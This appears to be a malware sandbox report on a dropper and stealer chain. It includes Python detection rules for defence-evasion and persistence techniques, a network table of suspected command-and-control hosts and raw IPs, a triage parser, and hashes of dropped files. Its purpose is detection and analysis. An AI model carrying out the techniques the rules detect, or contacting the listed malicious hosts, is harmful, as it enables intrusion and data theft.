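     "cmd": r'C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"'},
]

UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
PROTECTED_NAMES = {"csrss.exe", "lsass.exe", "svchost.exe", "winlogon.exe"}
SYSTEM_DIRS = re.compile(r"^c:\\windows\\(system32|syswow64)\\", re.I)

def _name(path):
    return path.rsplit("\\", 1)[-1].lower()

def defender_exclusion(e):  # T1562.001: Add-MpPreference -Exclusion*
    return re.search(r"add-mppreference\b.*-exclusion(path|process|extension)", e["cmd"], re.I) is not None

def firewall_allow_rule(e):  # T1562.004: inbound allow rule added via netsh
    return re.search(r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*action=allow", e["cmd"], re.I) is not None

def update_service_stop(e):  # T1489: Windows Update / BITS / delivery services stopped
    return any(s.lower() in UPDATE_SERVICES for s in re.findall(r"\bsc\s+stop\s+(\S+)", e["cmd"], re.I))

def system_scheduled_task(e):  # T1053.005: task registered to run as SYSTEM
    c = e["cmd"]
    return bool(re.search(r"schtasks\s+/create\b.*/ru\s+'?system'?", c, re.I)
                or re.search(r"register-scheduledtask\b.*-user\s+'?system'?", c, re.I))

def sleep_timeouts_disabled(e):  # keeps the host awake; no clean ATT&CK sub-technique
    return re.search(r"powercfg\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0\b", e["cmd"], re.I) is not None

def masquerading_system_binary(e):  # T1036.005: csrss.exe living outside System32/SysWOW64
    return _name(e["image"]) in PROTECTED_NAMES and not SYSTEM_DIRS.match(e["image"])

def extensionless_roaming_binary(e):  # T1036: image with no extension under AppData\Roaming
    return "\\appdata\\roaming\\" in e["image"].lower() and "." not in _name(e["image"])

def applaunch_injection_target(e):  # T1055: AppLaunch.exe spawned by a dropper in Temp
    return _name(e["image"]) == "applaunch.exe" and "\\appdata\\local\\temp\\" in e["parent"].lower()

RULES = [defender_exclusion, firewall_allow_rule, update_service_stop, system_scheduled_task,
         sleep_timeouts_disabled, masquerading_system_binary, extensionless_roaming_binary,
         applaunch_injection_target]

def run(events):
    """Return {rule name: [command lines that fired it]}."""
    hits = {}
    for e in events:
        for rule in RULES:
            if rule(e):
                hits.setdefault(rule.__name__, []).append(e["cmd"])
    return hits

if __name__ == "__main__":
    for name, cmds in run(EVENTS).items():
        print(f"{name}: {len(cmds)} hit(s); first: {cmds[0][:80]}")
```

On a live host the same predicates apply to the CommandLine, Image and ParentImage fields of Sysmon event 1 or Security 4688 (with command-line auditing on). The `schtasks /run /tn "GoogleUpdateTaskMachineQC"` line is kept as a negative on purpose: the task name alone is weak, the `/create ... /ru 'System'` registration one line earlier is the signal, and the WriteProcessMemory rows are what justify treating the argument-less AppLaunch.exe as an injection target rather than a normal .NET launch.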

Network

Country Destination Domain Proto
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 store.steampowered.com udp
US 8.8.8.8:53 twitter.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
US 104.244.42.129:443 twitter.com tcp
US 104.244.42.129:443 twitter.com tcp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 163.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 129.42.244.104.in-addr.arpa udp
JP 23.207.106.113:443 steamcommunity.com tcp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 www.epicgames.com udp
US 8.8.8.8:53 113.106.207.23.in-addr.arpa udp
US 8.8.8.8:53 171.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 abs.twimg.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 store.cloudflare.steamstatic.com udp
US 8.8.8.8:53 community.cloudflare.steamstatic.com udp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 172.64.145.151:443 community.cloudflare.steamstatic.com tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 34.202.40.65:443 www.epicgames.com tcp
US 34.202.40.65:443 www.epicgames.com tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 151.101.1.21:443 www.paypal.com tcp
US 151.101.1.21:443 www.paypal.com tcp
US 104.244.42.129:443 twitter.com tcp
US 104.244.42.129:443 twitter.com tcp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 151.145.64.172.in-addr.arpa udp
US 8.8.8.8:53 10.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 65.40.202.34.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
US 157.240.5.35:443 facebook.com tcp
US 157.240.5.35:443 facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 186.15.239.18.in-addr.arpa udp
US 8.8.8.8:53 35.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 fbcdn.net udp
US 157.240.5.35:443 fbcdn.net tcp
US 157.240.5.35:443 fbcdn.net tcp
US 8.8.8.8:53 80.41.65.18.in-addr.arpa udp
US 8.8.8.8:53 ocsp.r2m02.amazontrust.com udp
US 18.238.246.206:80 ocsp.r2m02.amazontrust.com tcp
US 8.8.8.8:53 206.246.238.18.in-addr.arpa udp
US 8.8.8.8:53 www.paypalobjects.com udp
US 8.8.8.8:53 fbsbx.com udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 157.240.5.35:443 fbsbx.com tcp
US 157.240.5.35:443 fbsbx.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 172.217.168.214:443 i.ytimg.com tcp
NL 172.217.168.214:443 i.ytimg.com tcp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 214.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 numpersb.fun udp
US 8.8.8.8:53 killredls.pw udp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 38.209.67.172.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 8.8.8.8:53 tracking.epicgames.com udp
US 13.89.179.12:443 watson.telemetry.microsoft.com tcp
US 13.89.179.12:443 watson.telemetry.microsoft.com tcp
US 18.239.36.103:443 static-assets-prod.unrealengine.com tcp
US 18.239.36.103:443 static-assets-prod.unrealengine.com tcp
US 44.214.245.214:443 tracking.epicgames.com tcp
US 44.214.245.214:443 tracking.epicgames.com tcp
US 8.8.8.8:53 103.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 214.245.214.44.in-addr.arpa udp
US 8.8.8.8:53 12.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 t.paypal.com udp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 151.101.1.35:443 t.paypal.com tcp
US 151.101.1.35:443 t.paypal.com tcp
US 172.67.209.38:80 killredls.pw tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.1.101.151.in-addr.arpa udp
JP 23.207.106.113:443 steamcommunity.com tcp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 store.steampowered.com udp
NL 104.85.0.101:443 store.steampowered.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 www.recaptcha.net udp
US 8.8.8.8:53 c.paypal.com udp
NL 142.250.179.163:443 www.recaptcha.net tcp
NL 142.250.179.163:443 www.recaptcha.net tcp
US 172.67.209.38:80 killredls.pw tcp
US 151.101.1.21:443 c.paypal.com tcp
US 151.101.1.21:443 c.paypal.com tcp
US 192.55.233.1:443 tcp
US 192.55.233.1:443 tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
RU 5.42.92.51:19057 tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 52.182.143.212:443 watson.telemetry.microsoft.com tcp
US 8.8.8.8:53 b.stats.paypal.com udp
US 64.4.245.84:443 b.stats.paypal.com tcp
US 64.4.245.84:443 b.stats.paypal.com tcp
US 172.67.209.38:80 killredls.pw tcp
US 52.182.143.212:443 watson.telemetry.microsoft.com tcp
US 18.239.36.103:443 static-assets-prod.unrealengine.com tcp
US 18.239.36.103:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 212.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 84.245.4.64.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 dub.stats.paypal.com udp
US 64.4.245.84:443 dub.stats.paypal.com tcp
US 64.4.245.84:443 dub.stats.paypal.com tcp
US 8.8.8.8:53 c6.paypal.com udp
US 151.101.1.35:443 c6.paypal.com tcp
US 151.101.1.35:443 c6.paypal.com tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 192.55.233.1:443 tcp
US 192.55.233.1:443 tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 talon-website-prod.ecosec.on.epicgames.com udp
US 104.18.41.136:443 talon-website-prod.ecosec.on.epicgames.com tcp
US 104.18.41.136:443 talon-website-prod.ecosec.on.epicgames.com tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 52.168.117.173:443 watson.telemetry.microsoft.com tcp
US 8.8.8.8:53 136.41.18.104.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 173.117.168.52.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 api.steampowered.com udp
JP 23.207.106.113:443 api.steampowered.com tcp
JP 23.207.106.113:443 api.steampowered.com tcp
JP 23.207.106.113:443 api.steampowered.com tcp
JP 23.207.106.113:443 api.steampowered.com tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 talon-service-prod.ecosec.on.epicgames.com udp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 js.hcaptcha.com udp
US 104.19.218.90:443 js.hcaptcha.com tcp
US 104.19.218.90:443 js.hcaptcha.com tcp
US 8.8.8.8:53 90.218.19.104.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 104.19.219.90:443 newassets.hcaptcha.com tcp
US 104.19.219.90:443 newassets.hcaptcha.com tcp
NL 172.217.168.214:443 i.ytimg.com tcp
NL 172.217.168.214:443 i.ytimg.com tcp
US 8.8.8.8:53 90.219.19.104.in-addr.arpa udp
US 8.8.8.8:53 api2.hcaptcha.com udp
US 104.19.219.90:443 api2.hcaptcha.com tcp
US 104.19.219.90:443 api2.hcaptcha.com tcp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 52.182.143.212:443 watson.telemetry.microsoft.com tcp
US 52.182.143.212:443 watson.telemetry.microsoft.com tcp
US 52.182.143.212:443 watson.telemetry.microsoft.com tcp
RU 5.42.92.190:80 5.42.92.190 tcp
NL 194.169.175.118:80 194.169.175.118 tcp
RU 5.42.92.51:19057 tcp
NL 172.217.168.214:443 i.ytimg.com tcp
NL 172.217.168.214:443 i.ytimg.com tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 190.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 194.49.94.80:42359 tcp
US 8.8.8.8:53 80.94.49.194.in-addr.arpa udp
US 52.182.143.212:443 watson.telemetry.microsoft.com tcp
US 52.182.143.212:443 watson.telemetry.microsoft.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 52.182.143.212:443 watson.telemetry.microsoft.com tcp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 52.182.143.212:443 watson.telemetry.microsoft.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 52.182.143.212:443 watson.telemetry.microsoft.com tcp
RU 5.42.92.190:80 5.42.92.190 tcp
IT 185.196.9.161:80 185.196.9.161 tcp
US 8.8.8.8:53 161.9.196.185.in-addr.arpa udp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 16.64.42.5.in-addr.arpa udp
FI 77.91.68.247:80 77.91.68.247 tcp
US 8.8.8.8:53 247.68.91.77.in-addr.arpa udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 bluepablo.fun udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 41.18.21.104.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
RU 5.42.92.190:80 5.42.92.190 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 194.49.94.72:80 194.49.94.72 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 72.94.49.194.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 194.49.94.11:80 194.49.94.11 tcp
US 104.21.18.41:80 bluepablo.fun tcp
NL 194.169.175.235:42691 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 11.94.49.194.in-addr.arpa udp
US 8.8.8.8:53 235.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 31.12.26.104.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
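Added example, not part of the report: a parser for rows in the Network table's format that separates the web traffic from the C2 candidates. SAMPLE_ROWS is a constructed subset copied from the table above; the three heuristics (flows with no hostname or a raw IP as hostname, ports other than 80/443, names resolved but never contacted) are this example's own and not the sandbox's scoring.

```python
"""Added example, not part of the sandbox report: split rows of the Network
table into web traffic and C2 candidates.

SAMPLE_ROWS is a constructed subset copied from the table; the parser and the
heuristics (direct-to-IP, non-web port, resolved-but-never-contacted) are this
example's own, not the sandbox's scoring."""

SAMPLE_ROWS = """\
Country Destination Domain Proto
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 killredls.pw udp
US 172.67.209.38:80 killredls.pw tcp
US 192.55.233.1:443 tcp
RU 5.42.92.51:19057 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
NL 194.169.175.118:80 194.169.175.118 tcp
US 194.49.94.80:42359 tcp
FI 77.91.68.247:80 77.91.68.247 tcp
US 104.21.18.41:80 bluepablo.fun tcp
NL 194.169.175.235:42691 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 104.26.12.31:443 api.ip.sb tcp
"""

WEB_PORTS = {80, 443}


def parse_rows(text):
    """Rows are 'Country Destination [Domain] Proto'. Domain is absent when the
    sandbox saw no name for the flow and equals the IP for raw-IP HTTP."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = ""
        else:
            continue
        if ":" not in dest:
            continue  # header line or something that is not ip:port
        ip, port = dest.rsplit(":", 1)
        if not port.isdigit():
            continue
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def triage(text):
    queried, contacted, direct_ip, odd_port = set(), set(), set(), set()
    for r in parse_rows(text):
        if r["proto"] == "udp" and r["port"] == 53:
            # DNS query rows; the in-addr.arpa ones are the sandbox's reverse lookups
            if not r["domain"].endswith(".in-addr.arpa"):
                queried.add(r["domain"])
            continue
        if r["proto"] != "tcp":
            continue
        endpoint = f"{r['ip']}:{r['port']}"
        if r["domain"] and r["domain"] != r["ip"]:
            contacted.add(r["domain"])
        else:
            direct_ip.add(endpoint)  # no hostname in the table: hard-coded address
        if r["port"] not in WEB_PORTS:
            odd_port.add(endpoint)
    return {
        "direct_ip": sorted(direct_ip),
        "nonstandard_port": sorted(odd_port),
        "dns_only": sorted(queried - contacted),
        "named_hosts": sorted(contacted),
    }


if __name__ == "__main__":
    for key, values in triage(SAMPLE_ROWS).items():
        print(f"{key}: {', '.join(values)}")
```

Fed the whole table, direct_ip also picks up 5.42.64.16:443, 5.42.65.80:80, 185.196.9.161:80, 194.49.94.72:80 and 194.49.94.11:80, and dns_only adds numpersb.fun alongside a few CDN names that were queried but never reached, which is why that bucket is a lead rather than a verdict. The google, facebook, steam and paypal rows are deliberately not scored: the table carries no process attribution, so it does not say whether the Edge session or the sample fetched them. api.ip.sb is a public IP-lookup service; a stealer checking its own egress address is the usual reason for it to show up in a detonation.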

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe

MD5 50ee6759cfdfd746762c9cf4061cbcdf
SHA1 7d52230cea679c2415012c3d0df3e0016687bde9
SHA256 395ac6242c9cb86a078a1033d950869fa6c8f77834b980a6955fd60d36fce6a8
SHA512 f0b6d4a0b0cb04306985ef065145e33981acdacc1a29884a4bc33ccdeb7d01720cfe6717b19a5c5b26a31120329fc060dd21ae4afa6b810216f5defe79a8d9b7

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe

MD5 50ee6759cfdfd746762c9cf4061cbcdf
SHA1 7d52230cea679c2415012c3d0df3e0016687bde9
SHA256 395ac6242c9cb86a078a1033d950869fa6c8f77834b980a6955fd60d36fce6a8
SHA512 f0b6d4a0b0cb04306985ef065145e33981acdacc1a29884a4bc33ccdeb7d01720cfe6717b19a5c5b26a31120329fc060dd21ae4afa6b810216f5defe79a8d9b7

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe

MD5 c05b08f67b7aad899f4da5448e853f21
SHA1 db7a4ddff9f52fff8c705ff47f54cc4bb06ca63a
SHA256 79f4ff44447b485b1d81bec3345980366cc57bf2a38ab717a9c3170f73f5800c
SHA512 133ce71ae445afb7bf3612778cd974e565fc72052bb1e657e39da03d90fb4f990269a3a7241925f7bdf83f40174a8f8c0019fa55353687d44305c73238c9bda4

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe

MD5 c05b08f67b7aad899f4da5448e853f21
SHA1 db7a4ddff9f52fff8c705ff47f54cc4bb06ca63a
SHA256 79f4ff44447b485b1d81bec3345980366cc57bf2a38ab717a9c3170f73f5800c
SHA512 133ce71ae445afb7bf3612778cd974e565fc72052bb1e657e39da03d90fb4f990269a3a7241925f7bdf83f40174a8f8c0019fa55353687d44305c73238c9bda4

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe

MD5 ec9347db8088e2aad2304dd6027992df
SHA1 b1b5e430fd245bf4d1d15f71621f59b6a297bbf8
SHA256 5b711bca861f09e06fc477b38545e40f4ba0f725350fa0ae103927a80ac92a5b
SHA512 606401ff4ca35c5030950e21165c5ddf95b90c3038dc53438aaff5810d9e2cf18b72adc10d8484ae63b88b45ac886993181305c2235bfdf6b54e8efa3c50b69e

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe

MD5 ec9347db8088e2aad2304dd6027992df
SHA1 b1b5e430fd245bf4d1d15f71621f59b6a297bbf8
SHA256 5b711bca861f09e06fc477b38545e40f4ba0f725350fa0ae103927a80ac92a5b
SHA512 606401ff4ca35c5030950e21165c5ddf95b90c3038dc53438aaff5810d9e2cf18b72adc10d8484ae63b88b45ac886993181305c2235bfdf6b54e8efa3c50b69e

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe

MD5 b65976f1a9f65a1633702e9818ca5a6c
SHA1 d71e6712d84059ce9f440390cafb2806a88ed135
SHA256 3226bad2e200895caec2327de882e5cde340f296f7e6718f80fe328b57479495
SHA512 9f0b144b5559d1b25d25176e6713c127d25d3d01f4ba793350cde10f73f317de712a3ea95bafe8073cd490590bdcc90285e421d3f2a364912d69f5355032c0fc

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe

MD5 b65976f1a9f65a1633702e9818ca5a6c
SHA1 d71e6712d84059ce9f440390cafb2806a88ed135
SHA256 3226bad2e200895caec2327de882e5cde340f296f7e6718f80fe328b57479495
SHA512 9f0b144b5559d1b25d25176e6713c127d25d3d01f4ba793350cde10f73f317de712a3ea95bafe8073cd490590bdcc90285e421d3f2a364912d69f5355032c0fc

memory/2676-28-0x00000204EA420000-0x00000204EA430000-memory.dmp

memory/2676-44-0x00000204EA800000-0x00000204EA810000-memory.dmp

memory/2676-63-0x00000204E95C0000-0x00000204E95C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe

MD5 56a4b03e573082701b127e974c5d6919
SHA1 c07175bd2eddba62872ac5d709c7f710435c814c
SHA256 6365a04ca80a8a982896fab3edb22deb592be679d0faa7b970e5a11b91b2f110
SHA512 ded3a2af8caeaec92702b07bf6f44879d6a2b969ff6a33852c1c1db3327c159acc28b6c1ecf6176b92826771d3bd9aff02afdc30c1c770f316ead6b55ccfb559

memory/3976-77-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3976-83-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3976-85-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3976-89-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe

MD5 b938034561ab089d7047093d46deea8f
SHA1 d778c32cc46be09b107fa47cf3505ba5b748853d
SHA256 260784b1afd8b819cb6ccb91f01090942375e527abdc060dd835992d88c04161
SHA512 4909585c112fba3575e07428679fd7add07453e11169f33922faca2012d8e8fa6dfb763d991c68d3b4bbc6e78b6f37d2380c502daada325d73c7fff6c647769b

memory/3940-92-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 05cf8989d7549aff8355e8e65aca6d68
SHA1 2b43c674548fdeb8c3a064cbcc04184613ce2529
SHA256 cd2dad3e04685a553beaffe71a39bf9dcce0a70dc6d75d87e93bce04b1326b13
SHA512 16e846eb33a649ea9b41750c5d2691db6657402f7c2ff8939b717ddb90598226ef449433683ca2472ee470299aaec5c0ad7947bbc7504eb95dfb85adfadce97d

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1bfe591a4fe3d91b03cdf26eaacd8f89
SHA1 719c37c320f518ac168c86723724891950911cea
SHA256 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
SHA512 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 39653f9fda1b60a58d8205d8ecdaeb8c
SHA1 180e862f7cad6354982b8a9085345d49a01b30c7
SHA256 cb632c2c465df09bc48f451c6f5d18a26e95c35e003131ba2e9315c16d4ca528
SHA512 36d8eb46a2c1b7254e07e7c4bd3f5f8b6e90380728b84a98ece97f48e265879aec7787692295cda6e9fd2095416ba12fc166f05671693bf8199fb3bf7d6f87b7

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

